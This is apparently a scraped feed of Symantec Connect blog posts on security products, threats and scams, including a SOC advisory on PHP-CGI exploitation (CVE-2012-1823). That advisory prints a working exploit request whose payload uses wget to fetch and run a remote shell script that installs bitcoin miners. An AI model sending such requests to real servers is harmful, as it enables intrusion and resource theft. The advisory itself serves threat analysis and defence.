Quantcast
Channel: Symantec Connect - ブログエントリ
Viewing all 5094 articles
Browse latest View live

My note on how to accelerate Oracle with Symantec Storage Foundation using proper storage tiering with SmartTier and SmartIO

0
0

Accelerate Oracle with Symantec Storage Foundation


Protecting the Next Flood of Information

0
0

At Symantec, we make the world a safer place by helping people, businesses, and governments protect and manage their information, so they can focus on achieving their goals.

And protecting information is becoming an ever-greater challenge as the amount dramatically increases and it’s stored in a growing number of locations.

The flood of information is just starting: IDC in its Digital Universe study predicts that there will be 40 Zettabytes of data by 2020. As a comparison, there are only 1.3 Zetta liters of water stored in all of the earth’s oceans. There will be only 1.5 Zetta seconds that tick by during the course of 50 billion years. We are creating and storing an incomprehensible amount of information.

Symantec’s strategy is simple – we will protect, secure and manage our customers’ information wherever it lives. And as more and more information is stored in and delivered from the cloud, Symantec is there to protect it.

We know the approach to securing information must change. Security can no longer be about running numerous point products. Customers want unified security – security that’s multi-tier, multi-layer, integrated and automated – all delivered as a service.  Unified security enables visibility into an organization’s compliance and security posture, giving an enterprise the ability to:

  • take a risk-based approach to identify and protect their most important assets
  • keep the bad guys out
  • minimize the impact of a cybersecurity event
  • respond  and recover quickly

Unified security means big data security intelligence delivered from the cloud, leveraging telemetry from millions of mobile endpoints – to be able to protect information from the most advanced threats. Symantec is there today.

And to truly secure, manage and derive value from this mountain of information, we need to better understand it by leveraging meta-data and analytics. Enterprise information is stored in isolated repositories that are secured and managed separately – and this just gets harder with information moving to a variety of clouds. These silos of information must be tied together into an information fabric. This information fabric will enable businesses to have a consistent view across their information tier, to be able to create the right policies around their information and to be able to efficiently store and deliver their information assets.

As Symantec executes on our strategy to provide unified security and information fabric into our customers’ evolving hybrid cloud environments, we are already delivering a comprehensive set of cloud services from across our portfolio including:

  • Symantec’s Email Security.cloud and Enterprise Vault.cloud enable our customers to secure, store, manage and discover their business-critical information.
  • Symantec’s Web Site Security Solutions put the “s” in https – we deliver SSL, certificate management, vulnerability assessment and malware scanning from the Symantec cloud.
  • Symantec’s digital certificate-based trust services supports over 200 million devices, including cable set-top boxes, delivered and managed from our cloud-based platform
  • Symantec VIP is our cloud-based strong authentication service that enables secure access to networks and applications while preventing access by malicious unauthorized attackers.
  • Symantec protects our consumer customers’ data by backing up more than 120 petabytes in our Norton backup cloud.
  • Norton Zone is our cloud-based secure sync and share platform – which allows users to easily share files and folders protected by high-level, industrial-grade encryption both during transfer and while stored in our secure data centers.
  • Symantec and Microsoft have a joint effort to deliver Disaster Recovery as a Service (DRaaS), leveraging Symantec data replication and failover management to Microsoft's Azure cloud services.
  • Symantec is building a next generation cloud platform and hiring top-tier talent, including SVP of cloud platform engineering Stephen McHenry from Google.

Cloud is infused in everything we do. As the nature of cloud computing matures, it’s less about the “cloud” and more about the secure delivery of powerful services. The world will continue to become more complex; Symantec is dedicated to working with partners to build rich ecosystems to protect and manage our customers’ information.

 

Top Viewed Content in 2013: Storage and Clustering Community

0
0

IoT and the problem of identity

0
0

Identity management was never easy. The basic need for identity is that of ‘non-repudiation’ - assurance that a person is who they say they are - as used to authenticate and authorise individuals to use IT resources, or enable access to web sites and services.

Things such as a login names, pins and passwords are examples of mechanisms that allow us to establish digital ‘identity’ today. For computer users and system managers, the difficulty has always been keeping tabs on all the different login details, number-generating dongles, and swipe cards and so on. The domain of "identity management" (the umbrella term for tools that help manage multiple identities, across multiple systems) is focused on helping with these issues. 

So far so good, but I’m wondering if these ideas are thrown out f the window by the current trend - the Internet of Things (IoT), which enables a wide variety of devices and physical objects to connect to the Internet. 

For a start, the establishing of "identity" is undergoing a significant evolution as illustrated by the term ‘the quantified self’. This term is being used to describe (for example) always-on fitness and personal monitoring devices. They are "connected", they know who we are but they do not require a traditional "log in". If these technologies know who we are, what is to stop them telling another computer system or from somebody else tracking our movements?

To take things one step further, with IoT it isn’t just people who need to be identified, but a wide array of other physical objects (from cars to fridges, from training shoes to toasters). To take a not-so-farfetched example, systems now exist to monitor livestock in the fields, and identify potential disease symptoms. A farmer will, however, want to be sure that the cows being monitored actually belong to the right farm and equally, that the mechanisms involved aren’t being used to hack into farm’s computer systems.

As we connect things to the Internet, then, we also need ways of ensuring they are what they say they are. This creates a new challenge - which is how to manage the identities of all the devices we are in the process of creating, in all their scenarios, shapes and sizes.  No, identity management was never easy. But it looks set to become even harder (most commentators predict that, by 2020, over 20 billion devices with be connected to the internet (over two times the human population on earth at that time).

Symantec is excited about this area because we have spent the past few years building technical assets that could really help to solve this problem. By combining the user authentication, end-point security, device management and global intelligence assets, we plan to stay ahead of the game here and provide services that can help to make IoT a productive and secure reality.

PHP Inclusion Activity

0
0

Since the 14th of December, the SOC has noticed a substantial increase in the quantity of PHP code inclusion attacks against MSS customers. Specifically, attempts to compromise and infect internet facing webservers by injecting malicious PHP code have been observed. While the primary vulnerability being targeted (CVE-2012-1823) isn’t new, a significant uptick in attempts to exploit it is worthy of note. Proof of concept exploit code has been publically available for some time. At this time, it appears that only Linux webservers running out of date versions of PHP are vulnerable.

php-attack-blog-1.png

At the time of this post, more than sixty SOC customers have been affected by these exploit attempts. There is no clear correlation between this activity and any individual industry vertical, with customers in health, financial, telecommunications, local government, and more being affected.

The main driver behind these exploits is to compromise and infect the victim webserver for financial gain. Binaries were extracted from the malicious servers utilized in the attack, revealing primarily bitcoin mining malware. Bitcoins are a virtual currency which is generated based on mathematical operations known as ‘mining’ on computer hardware. Attackers often infect machines with the intent of using them to generate bitcoins for financial gain.

More than 1,000 sources have been observed participating in this exploit activity since the initial increase was noted. There’s no clear trend or geographic breakdown of source addresses that would lend itself to attribution. Due to the nature of the attack, return traffic to the source host is not required. Redirection information is contained in the original exploit attempt, leading us to believe that source IP information has been spoofed. Identical exploit strings have been observed from numerous source addresses, further indicating spoofed activity.

Analysis:

Below is an example of one of several observed packages surrounding these exploit attempts. Other samples encountered during our research perform similar actions.

Example inbound traffic

POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1

Host: [victim server IP]

User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25

Content-Type: application/x-www-form-urlencoded

Content-Length: 84

Connection: close

<?php system("wget http://74.208.228[.]113/a  -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh");

Translation

  1. A percent encoded hex POST request is passed to the victim server attempting to exploit the vulnerability, followed by PHP containing shell commands.
  • Decoded POST:

POST /cgi-bin/php.cgi?-d?allow_url_include=on?-d?safe_mode=off?-d?suhosin.simulation=on?-d?disable_functions=""?-d?open_basedir=none?-d?auto_prepend_file=php://input?-d?cgi.force_redirect=0?-d?cgi.redirect_status_env=0?-n

  1. The injected commands (if successfully executed by the victim server) will download, execute, and subsequently delete a malicious script designed to infect the victim.

At this point, the following files are downloaded and various steps are taken on the system. These steps include execution of additional malware (ELF executables), the addition of a cron job to ensure some form of persistence, and various process + file maintenance actions.

File Name            MD5                                                                                      Description

a                              d3754d4869164df4a6307d48d30752e6                    Shell script, initial activity

update                 7bb7dc624a19ed58fa9a0fdb30752098                     Shell script, update routine

sh                           83aa145f8b12365ca7ce37f0b03bf745                       Bitcoin miner/trojan

clamav                  8bcf90e5f865acd004a43f2ba891534b                      Bitcoin miner/trojan

VirusTotal Anti-Virus Detect Rate

sh                           83aa145f8b12365ca7ce37f0b03bf745                       6 / 49

clamav                  8bcf90e5f865acd004a43f2ba891534b                      11/49

php-attack-blog-2.png

A list of the files retrieved in this particular PHP exploit along with details and MD5 hashes.

php-attack-blog-3.png

The initial redirect contained inside the exploit leads to this script, which is downloaded and executed if the victim machine is vulnerable. This process sets up an “update” cron job (see below) as well as downloads and executes the core Bitcoin mining binaries. Notice the Stratum traffic to port 3333/TCP, which is a well-known Bitcoin protocol.

php-attack-blog-4.png

Contents of the “update” script. This process attempts to maintain persistence on the victim machine by re-running the initial “a” script if an existing malicious connection isn’t already open.

Impact and MSS detection:

At first glance, the intent of this exploit and infection activity isn’t to damage or steal information from victim webservers. The role of Bitcoin mining in this scenario is to harness the victim’s computational resources to financially benefit the perpetrators. The victim systems in this situation have been wrongfully hijacked and pressed into service, which may cause slowdowns for legitimate users and resource issues for server owners. Due to the persistent nature and continuous “phone home” tendencies of these infections, additional malicious action could be taken on infected machines in the future.

We believe the activity highlighted in this report is related to a worm detailed in the following Symantec write-up: http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices

Currently, MSS has coverage for this initial exploit activity via most IDS vendors, including Sourcefire, Cisco, Palo Alto, Emerging Threats, and more. Based on samples extracted and observed infections, additional post-compromise IP and URL based MSS signatures are in place across our entire customer base. At this stage, customers will be alerted to both exploit and compromise activity.

If you have any questions or concerns about the activity covered in this post, please contact the SOC via phone, portal chat, or email (analysis@monitoredsecurity.com).

Making Enterprise Vault More Secure

0
0

From time to time people ask questions about how to make Enterprise Vault data 'more secure'. This is usually around the under-the-covers activities like when a client retrieves an archived item, and it's transmitted back to the client can that be secured? The answer is yes, lets discuss how.

First of all the default transmission is HTTP

HTTP.png

And as you can see in Enterprise Vault 10.0.4 (and other flavours of EV too) you get a security warning, which when clicked, gives you a simple pop-up which says:

"Non-HTTPS traffic is not encrypted on the network. Do not use this option unless you are using a secure network".

The second thing to notice is that this is a site wide setting.

So, life is good if we are using a secure network. I know that there are philisophical discussions to be had about whether ANY network can be termed secure, but now lets just say that if all traffic is inside the corporate file it's secure.

But what about people who use Outlook Web Access?

This is a problem if Enterprise Vault is configured with Outlook Web Access extensions. Uses can access Outlook Web Access from 'anywhere'. Therefore when they retrieve an archived item, or perform a search and so on, the transmission, by default, is not going to be secure.

We need to change to HTTPS. For this there are two considerations:

Green Field

In a green field deployment, or in other words a fresh deployment of Enterprise Vault, HTTPS can be enabled and configured from Day 1... before ANYTHNG is archived. This is of course the ideal situation.

Brown Field

The brown field deployment, or in other words an existing deployment of Enterprise Vault can also be changed to use HTTPS. No problem there; except of course that all the existing shortcuts will then be broken. So if you do go down this route, you will need to take a look at the options of recreating Enterprise Vault shortcuts, which I've written about before in this blog post. (http://thingsilearnedtoday.net/2013/12/17/how-to-r...). It might not be necessary to perform those steps though, for example if archived items do not have shortcuts created at all (good for customers who push Virtual Vault usage)

Remember

It's also worth remembering that you don't just make this change in Enterprise Vault, if you look at the online help you have to obtain and install a valid certificate on the default web site in IIS.

Do you use HTTP or HTTPS in your Enterprise Vault deployment? Let me know in the comments.

 

Transformational Smart Cities: cyber security and resilience

0
0

Smart cities are on the increase worldwide and, especially within Europe, there are many such initiatives being stimulated by the EC and national governments. Local administrators and policy makers are under great pressure to make their cities increasingly competitive, in order to attract businesses, talent and taxpayers – and to comply with sustainable policies, greenhouse gas emission targets and carbon footprint guidelines.

What will they look like? In the main, smart city deployments will be multi-faceted, carried out by a diverse ecosystem of providers in innovative domains, involving state-of-the-art technology, including critical and complex ICT implementations. These deployments can address different components and city systems, such as Intelligent Transportation, Connected Healthcare, Public Safety and Security, Emergency Services, Smart Grid and Smart Metering, Intelligent Buildings, etc.

At the same time, increasing ICT complexity, hyper-connectivity, namely through ‘Internet of Things’ environments, as well as the generation of significant amounts of data,  will also mean increasing vulnerability, both to malicious attacks and unintentional incidents. By conceiving interconnected urban systems with security and information protection in mind and already built in, city administrators will be able to ensure service continuity, safety and well-being for citizens and businesses alike.

A centralised governance body will ultimately run the smart city through a central virtual dashboard, comprising the ICT operational centre – and that is a massive undertaking. It will demand constant ongoing assessment and timely response to a whole range of incidents and needs. Against this complex and challenging backdrop, how exactly do you safeguard the connected smart city? This is where threat intelligence services come in to play. With the right services partner’s systems in place, any threat to the security of the system and its information can be detected, analysed and dealt with. The ICT will be able to obtain reliable threat and vulnerability intelligence, and consequently dynamically adjust its security stance.

Moreover, where incidents occur, these need to be promptly and effectively managed by specialist operators and incident management tools, in order to return users and services to their normal operational status.

Against a threat landscape that is growing in intensity and sophistication, having an effective strategy to combat such attacks has become an integral consideration in the private sector boardroom and for policy-making within the public sector – because public administrators know that any serious incident or breach could result in devastating outcomes, in terms of financial, data, credibility and reputational loss or damage.

That is why choosing reputable, experienced thought leaders as partners in conceiving such complex developments is an important step in the right direction towards building resilient smart cities that will stand the test of time and set new benchmarks in urban development. With so much at stake, there really is no room for compromise when it comes to ensuring that these cities of the future enjoy the highest possible levels of protection.

For a more comprehensive approach, download the Executive Report, ‘Transformational Smart Cities: cyber security and resilience’, here: http://bit.ly/1fpsBpF

DeepSight Portal Updates now available!

0
0

You spoke up, we listened! We know that information is only as useful as it is easy to find, access, and use – especially security intelligence. It’s our goal to continue to make it easier for the right team members to get the right information quickly. Thanks to input from our faithful customers, we have added the following new functionality to the DeepSight portal:

  • Groups – now user administrators can create groups within their organization, assign vulnerabilities to people within those groups, and create reports by individuals within the group to improve the activity tracking
  • ‘Cloning’ a current account – to save time in setup for a new user, customers can now clone an existing account with all the privileges of another user, and then simply specify the contact information
  • Introducing workflow tracking– when a user wants to assign alerts and review the activity on that alert, we can now track and report on this functionality throughout the remediation
  • New communication streams - publication of system messages/service alerts to the home page and all including DataFeed customers
  • Additional information for IP lookups – we’ve added the attack signatures seen, the URLs, and the ports used to help the user understand the attack methodology
  • Additional Mobile operating systems – customers can specify mobile as a category under the monitor generation - we know Mobile is a hot topic!
  • Improved Search function – now keywords will look through all areas of DeepSight including .pdfs, to make it easier for customers to find topics of interest or concern
  • Bulk uploads – in order to support multi-national and larger conglomerates with multiple domains and URLs, we now support csv in our DeepSight alerts configuration

We appreciate the good feedback we’ve received since rolling out our new DeepSight Portal features in April 2013, and appreciate the continued idea exchange with our users. Together we will continue to improve the best Security Intelligence program in today’s market!


Gauging interest - Server Management Suite specific knowledge sharing sessions

0
0

 

We recently held our first User Group Summit with 75 customers representing 28 different User Groups.  We also had several Symantec employees in attendance to network, field questions, share ideas, etc. 

One of the valuable interactions we had came from a Server Management Suite discussion table held at lunch.  There was interest expressed from several folks around getting together more often to share insights and best practices around Server Management Suite specifically.  Some of the customers even offered to present some of this information. 

We’d like to gauge interest around holding these sessions around Server Management Suite in 2014.  Please reply to this blog or send me an email at ryan_terry@symantec.com and offer your thoughts regarding the following questions:

•   How often you'd like to meet virtually to discuss best practices around Server Management Suite in 2014? Example: once, twice, quarterly, etc.

•   What topics you'd like to discuss

•   Are you willing to share your insights and experience? If so, what topic(s) will you share.

•   Any other thoughts or ideas you'd like for me to consider with regards to this idea

Thank you for your help to make the Server Management Suite experience better!

Happy New Year from Symantec's Corporate Responsibility Team!

0
0

2013 was an eventful and exciting year here at Symantec, much of which we’ve documented using this space. While we’re all hard at work planning for our Fiscal Year 2015, which begins in April, January presents us with a great time to pause and look back at all the great things we’ve featured on the blog in 2013.

As the administrator of this space, I’m always amazed by the great stories our guest authors share. Here, a few of my favorites from 2013:

  1. In March, we were named one of the World’s Most Ethical Companies for the sixth year in a row. While the company always holds this designation in great regard, this year Scott Taylor, our Executive Vice President, General Counsel and Secretary, used this space to talk about what it really means to be an ethical company on a day-to-day basis at Symantec, and why the designation is meaningful.
  2. Early in the year, we announced grants totalling $1 million to education organizations around the globe. Some of these partners were new, and some were existing partnerships that we were looking to take to the next level. All of them are integral parts of helping to create the next generation of innovators.
  3. In April, our CEO, Steve Bennett, blogged about the fact that our global employee base increased their volunteer hours by over 40 percent fiscal-year-over-fiscal year. The fact that our CEO celebrates this as a significant company accomplishment speaks volumes to me, as an employee, about the credibility of our corporate messaging around employee engagement and satisfaction.
  4. For National Cyber Security Awareness Month in October, Internet Safety Advocate Marian Merritt wrote about best practices for keeping your child safe on mobile technology. This was a great example of how Symantec can apply its core business strengths to help protect society, but this piece also spoke strongly to me as a parent. It provides straight-forward, commonsense advice that I can immediately apply to my life.
  5. Last month, Father Jeff Putthoff, Executive Director of Hopeworks ‘N Camden, blogged about Hopeworks’ and Symantec’s long-standing partnership to provide job skills and education assistance to youth. Hopeworks is doing important work in Camden, and I love the grassroots genesis of this partnership, and the dedication of our employees who support these efforts year after year.

What are your favorites? I’d love to hear from you!

 

Lora Phillips is Symantec's Senior Manager, Global Corporate Responsibility.

Is this the end of ZeroAccess botnet?

0
0

It appears so. Zeroaccess botnet responsible for infecting around 2 million computers worldwide was targeted at making money through pay-per click advertising. It is also known it was able to download other threats like misleading applications on the compromised machines. It would download additional software in order to mine bitcoin currency. While the malicious activity was in progress the Trojan.Zeroaccess would hide itself with help of very advance rootkit.

Already in July 2013 Symantec Security Response Engineers managed to "sinkhole" over 25% botnet machines following an extensive study on finding out the ways of bots communication. Making use of a weakness in Zeroaccess P2P mechanism ca. 500k machines were freed from the botnet. In the meantime the botnet creators distributed a new version of Zeroaccess that addressed the found design flaw. More information about the Symantec Security Response study and operation may be found here:

Grappling with the ZeroAccess Botnet

https://www-secure.symantec.com/connect/blogs/grappling-zeroaccess-botnet

 

In December 2013 Microsoft Digital Crimes Unit filled its civil case in the U.S. District Court for the Western District of Texas against the ZeroAccess botnet. They have as well received authorization from the Court to block incoming and outgoing traffic between computers in US and 18 identified IP addresses being used for fraudulent actions. Microsoft took also control over 49 domains assiociated with ZeroAccess botnet. Microsoft actions were coordinated with Europol law enforcement agency to execute search warrants on the identified IP addresses in Europe.

As Microsoft suggested the expectations of the action were not to fully eliminate the botnet as due to its complexity but to "disrupt its operations significantly" and this seemed to have worked really well as since all the measures taken in December there was no new ZeroAccess code released by the malware authors. It seems as well the bot-herders have halted their actions while seeding "White Flag" in the code of one of the last updates send to infected computers - this may suggest they decided to give up control of the botnet for good.

Recent SophosLabs studies just published this week show as well no growth in the size of the botnet but even indicate complete stop in the number of new Droppers. This together with dropping number of ZeroAccess detections would suggest a significant success of the worldwide actions against the botnet. The future months will show if this is the end or if we see any evolution of this threat.

 

References:

Microsoft, the FBI, Europol and industry partners disrupt the notorious ZeroAccess botnet
http://www.microsoft.com/en-us/news/press/2013/dec13/12-05zeroaccessbotnetpr.aspx

ZeroAccess criminals wave white flag: The impact of partnerships on cybercrime
http://blogs.technet.com/b/microsoft_blog/archive/2013/12/19/zeroaccess-criminals-wave-white-flag-the-impact-of-partnerships-on-cybercrime.aspx

Microsoft and partners fight back against the ZeroAccess botnet
http://nakedsecurity.sophos.com/2013/12/06/microsoft-and-partners-take-down-zeroaccess-botnet

Have we seen the end of the ZeroAccess botnet?
http://nakedsecurity.sophos.com/2014/01/07/have-we-seen-the-end-of-the-zeroaccess-botnet

 

Fake Curse client stealing WOW's user credentials

0
0

In a recent "sticky" thread on Battle.net forums a new threat targetting WOW players has been reported. The Trojan "Disker" is able to compromise even the accounts using Authenticator Protection. It steals both the account credentials and Authenticator password. To verify if the machine has been compromised with the trojan it is advised to create a MSinfo file and check in it for following entries in the Startup programs section:

Disker rundll32.exe c:\users\name\appdata\local\temp\w_win.dll,dw Name-PC\Name Startup
Disker64 rundll32.exe c:\users\name\appdata\local\temp\w_64.dll,dw Name-PC\Name Startup

Trojan originates from a fake Curse website offering malicious Curse clients for downloads - the website itself was popping-up recently on major search engines while looking for "curse client" phrase.

Blizzard advises to report any compromised account directly alongside of information regarding installed addons or plugins. On general note deleting any recently downloaded addons and full system scan are recommended.

 

References:

(Sticky) *Compromised accounts* Potential Trojan
http://us.battle.net/wow/en/forum/topic/11041384892

WoW gamers targeted with trojanized Curse client
http://www.net-security.org/malware_news.php?id=2666

Connect Dev Notes: 08 Jan 2013

0
0

Updates deployed to the Connect production servers as a result of the code sprint that ended 07 January 2014.

User Facing: Desktop

  • Added the ability for users to browse from one unread post post in their groups to the next (or previous) unread post in their groups. To see this feature in action, 1. Log in; 2. Choose "My Unread" under the Account menu; 3. Click a post title; 4. From the post click the "NEXT UNREAD" button. (See attached next-unread-in-groups.png)
  • Added the ability for bloggers to add subtitles to their blog posts.
  • Added the ability for blog administrators to add a list of recent blog posts to the right column of their blog pages.
  • Added the ability for blog administrators to add a Facebook Activity box to the right column of their blog pages. This activity box pulls updates from a targeted Facebook account and lists them on the relevant blog pages.
  • Removed the "Mark as solution" links from forum threads that are flagged as "for information only -- no solution required."
  • Fixed an issue with an update script we ran on November 13 changing the post dates of legacy blog posts. All posts are now (correctly) displaying their expected post dates.
  • Fixed an issue with the wrong solution provider being identified in notification emails that are sent when a post is marked as solved. These notifications now identify the solution provider correctly.
  • Merged the Symantec Management Platform (Notification Server) NS 7.x and SMP 7.x tags into a single Symantec Management Platform (Notification Server) 7.x tag. Updated all the content tagged with the legacy tags to use the new one.

Admin Facing

  • Updated code that manages solved forum posts to not display pending split-solution posts in the "Can you solve this?" list -- since, pending final approval, these posts have been solved.

SEO Wins

  • Added schema.org metadata to article, blog, and event entries so they can be better recognized and indexed by major search providers. Search engines including Bing, Google, Yahoo! and Yandex rely on this markup to improve the display of search results, making it easier for people to find the right web pages.

Fake Browser Update Site Installs Malware

0
0

In the first week of 2014, we came across a website using tried and tested social engineering techniques to coerce victims into installing malware. The domain http://newyear[REMOVED]fix.com, was registered on December 30, 2013. Based on our research, 94 percent of  attacks appear to be targeting users based in the United Kingdom through  advertising networks and free movie streaming and media sites.

The attackers attempt to trick victims using the following techniques:

  • A URL containing the words “new year” and “fix”
  • A professional looking template (from Google, Microsoft or Mozilla) telling the victim that a critical update is necessary for their system to function properly
  • Redirecting the user, based on their browser type, to a fake but convincing Chrome, Firefox, or Internet Explorer Web page.
  • Using a JavaScript loop to force the victim to give up and stay on site – users have to click on the “Yes/No” option 100 times in order to close the browser.

This particular social engineering attack is not novel, and plays on victims’ fear of needing to install urgent updates. Since the domain was registered only last week, it appears the attacker thought of this scheme at the very last minute, as the holiday season starts winding down.

The website, which is hosted in the Ukraine, uses a dual hybrid Web server setup by Apache and Nginx, with the latter identifying the victim’s browser and performing a redirect.

The user will see the Google Chrome, Mozilla Firefox, and Microsoft Internet Explorer templates, shown in Figures 1 to 3, based on the type of browser they are using.

Fake Browser Update 1.png

Figure 1. Page displayed to Chrome users

Fake Browser Update 2.png

Figure 2. Page displayed to Firefox users

Fake Browser Update 3.png

Figure 3. Page displayed to Internet Explorer users

Fake Browser Update 4.png

Figure 4. JavaScript loop button which requires 100 clicks to close

At the time of this blog post, the Internet Explorer version of the Web page is no longer functional. The Chrome download page serves up Chromeupdate.exe while the Firefox download page serves up Firefoxupdate.exe.

Both of these samples are detected by Symantec as Trojan.Shylock. Symantec also has the following IPS coverage in place for this attack:

Web Attack: Fake Software Update Website

To stay protected against this type of threat, Symantec recommends that users:

  • Keep antivirus definitions, operating systems, and software up-to-date.
  • Exercise caution when clicking on enticing links sent through emails, messaging services, or on social networks.
  • Only download files from trusted and legitimate sources.

Microsoft end of support for Windows XP and Office 2003 - April 2014

0
0

As per Microsoft Support Lifecycle Policy both Windows XP SP3 and Office 2003 will reach end of support on April 8, 2014. The end of support means that after this date there will be no new security updates, non-security hotfixes or patches for both those products available. Technical support for XP from Microsoft will also not be available any more. Running XP SP3 (or lower) and Office 2003 after the end of support date may expose the company to potential security and compliance risks. Worth consideration is also fact that aside of vulnerable system it is expected for several third party software vendors to stop support of their applications on XP Platform after April 2014 as well - this ads additional danger of vulnerable applications and multiplies the possible infection vectors.

For Symantec Endpoint Protection customers running SEP 11.x and 12.1 on XP platform - Symantec will continue releasing definitions for all so far supported Windows platforms - including XP SP3 after April 2014. Please note though that in certain cases Symantec Support may not be able to provide full-scope resolution on XP systems due to lack of available security patches for it. Additionaly SEP 11.x reached its End of Limited Support on January 5, 2014 and upgrade to 12.1 release is highly recommended. For more information please refer to below Symantec documentation:
 

FAQ: Upgrading Symantec Endpoint Protection 11.x to version 12.1.x

Article:TECH207274 | Created: 2013-06-17 | Updated: 2013-11-18 | Article URL http://www.symantec.com/docs/TECH207274

Microsoft End of Support on for Windows XP and what it means for SEP

Article:TECH204937 | Created: 2013-04-10 | Updated: 2013-07-10 | Article URL http://www.symantec.com/docs/TECH204937

References:
http://www.microsoft.com/en-us/windows/enterprise/endofsupport.aspx
http://windows.microsoft.com/en-us/windows/lifecycle
http://windows.microsoft.com/en-us/windows/end-support-help


Usability Study for EV Admins

0
0
Symantec would like to get your feedback on how we can improve the existing EV environment to make it easier for you. We are looking for EV administrators who use SCOM to monitor other applications, to participate in a 60 minute one on one remote usability study between January 20 to 22. Participants will also receive $75 incentives as a note of thanks for participation.
 

You can participate by filling 5 minute survey before January 14th

 
Looking forward to your participation!
 
 
Thanks,
Anjeli
User Researcher

 

New Year, New Apartment, Same Old Scams

0
0

The New Year has started and many people are still holding to their resolutions. Besides the usual suspects of exercising more and quitting smoking, some might have planned on finding a new apartment. Unfortunately, this also means a rise in prepaid rental ad scams. So be cautious while you’re searching for a new home.

The prepaid rental scam advertisements can be encountered on nearly any platform and in most countries. The ads often look very professional; some are even copies of real ads from legitimate sources. We have seen them on established apartment rental sites, online notice boards, B&B agency sites, and even in the classified ads section of newspapers. The website owners try their best to spot false advertisements and delete them as fast as possible, but there is always a chance that there is a new ad that hasn’t been removed yet.

The scam is pretty simple. Once the victim shows interest in the apartment the alleged landlord informs the victim that he is currently traveling and will not be able to show the apartment in person, but will send the keys after a security deposit has been made. This is a classical advance payment scam. The money is often requested through services other than regular bank wire transfers. After the victim sends the money, the scammer disappears with the deposit and is never heard from again. The key to the apartment is never sent, and the apartment may never have actually existed. Although some scammers made the effort of sending a real key that didn’t work on the apartment to the victim. The attacker may do this to buy some time to erase his tracks until the victim realizes the key does not work on the apartment.  

Some scammers also use the false pretense of a background check to gather personal information or passport photos of the victim, which can then be used to steal the victim’s identity.

Similar scams can happen in the other direction as well, often with rentals for vacation apartments. In those cases, the scammer pretends to be an interested renter instead of the landlord. Once all the details have been agreed on, the scammer will ask for the bank details in order to proceed with the wire transfer. The trick is that the scammer will transfer more money than the agreed sum to the landlord. This money does not come from the scammer’s bank account, but is instead stolen from an online banking account that has been hijacked by a financial Trojan. After the transfer has been credited, the landlord is contacted and asked to send the excess money back to the now allegedly traveling scammer through other means. A few days later, the landlord will be informed by the bank that the money was stolen and he will have to pay it back, since he served as a money mule.

So no matter if you are renting or leasing, you should always be vigilant and try to follow a few rules even if it can be difficult to verify the details.

  • Don’t pay any money in advance if you haven’t seen the apartment or met your contact.
  • If you can’t see the apartment or meet your contact, use a trusted escrow service.
  • Be cautious when sending money to a different address or through unusual financial services.
  • Do not rush the transaction or feel pressured. If the other party is too eager to sell, something might be wrong.
  • Money from a false transaction should only be sent back to the original account that it came from.
  • Search online for the email address or the advertisement text. Others may have already reported it as a scam.

Importance of key management

0
0

With the rise of Cybercrime, companies are investing significant amounts in Information Security in order to protect themselves, their employees and partners, but in the end that might not be enough.

偽のブラウザ更新サイトでインストールされるマルウェア

0
0

2014 年最初の週に、シマンテックは定番とも言えるソーシャルエンジニアリングの手法を使い、被害者に強制的にマルウェアをインストールさせる Web サイトを確認しました。ドメインは http://newyear[削除済み]fix.com で、2013 年 12 月 30 日に登録されています。シマンテックの調査によると、攻撃の 94% は英国のユーザーを狙っているようであり、広告ネットワークと、無料動画ストリーミングサイトやメディアサイトを通じて攻撃が仕掛けられています。

攻撃者は、以下のような手口で被害者を欺こうとします。

  • URL に「new year(新年)」や「fix(修正)」などの語句が含まれる。
  • いかにもそれらしい見かけのテンプレート(Google、Microsoft、Mozilla などの)を使い、システムの正常な動作には緊急のアップデートが必要であると説明する。
  • ブラウザの種類に応じて、Chrome、Firefox、Internet Explorer の Web ページにユーザーをリダイレクトする。リダイレクト先は偽サイトだが、まるで本物のように見える。
  • JavaScript のループ処理を使って、被害者がしかたなくサイトにとどまるように仕向ける。ブラウザを閉じるには、[Yes/No]オプションを 100 回もクリックしなければならない。

このようなソーシャルエンジニアリング攻撃は、独特ではありますが目新しいものではありません。緊急のアップデートをインストールしなければならないというユーザーの不安感を狙っています。ドメインは昨年末に登録されたばかりですが、もうホリデーシーズンも終わる時期だったので、攻撃者がこの手法を思いついたのは、ぎりぎり最後のタイミングだったようです。

Web サイトは、ウクライナにホストが置かれ、Apache と Nginx によってセットアップされたデュアルハイブリッド Web サーバーを利用しています。被害者のブラウザを識別してリダイレクトを実行しているのは、このうち Nginx です。

ユーザーには、使っているブラウザの種類に基づいて Google Chrome、Mozilla Firefox、または Microsoft Internet Explorer のテンプレートが表示されます(図 1 から 3)。

Fake Browser Update 1.png

図 1. Chrome のユーザーに表示されるページ

Fake Browser Update 2.png

図 2. Firefox のユーザーに表示されるページ

Fake Browser Update 3.png

図 3. Internet Explorer のユーザーに表示されるページ

Fake Browser Update 4.png

図 4: JavaScript のループを使ったボタン。100 回クリックしないと閉じない

この記事の執筆時点では、Internet Explorer 版の Web ページはすでに機能しなくなっています。Chrome のダウンロードページからは Chromeupdate.exe がダウンロードされ、Firefox のダウンロードページからは Firefoxupdate.exe がダウンロードされます。

どちらのサンプルも、シマンテックは Trojan.Shylockとして検出します。シマンテックは、この攻撃に対して以下の IPS 定義を提供しています。

Web Attack: Gongda Exploit Kit Website

この手の脅威から身を守るために、シマンテックは以下のことを推奨します。

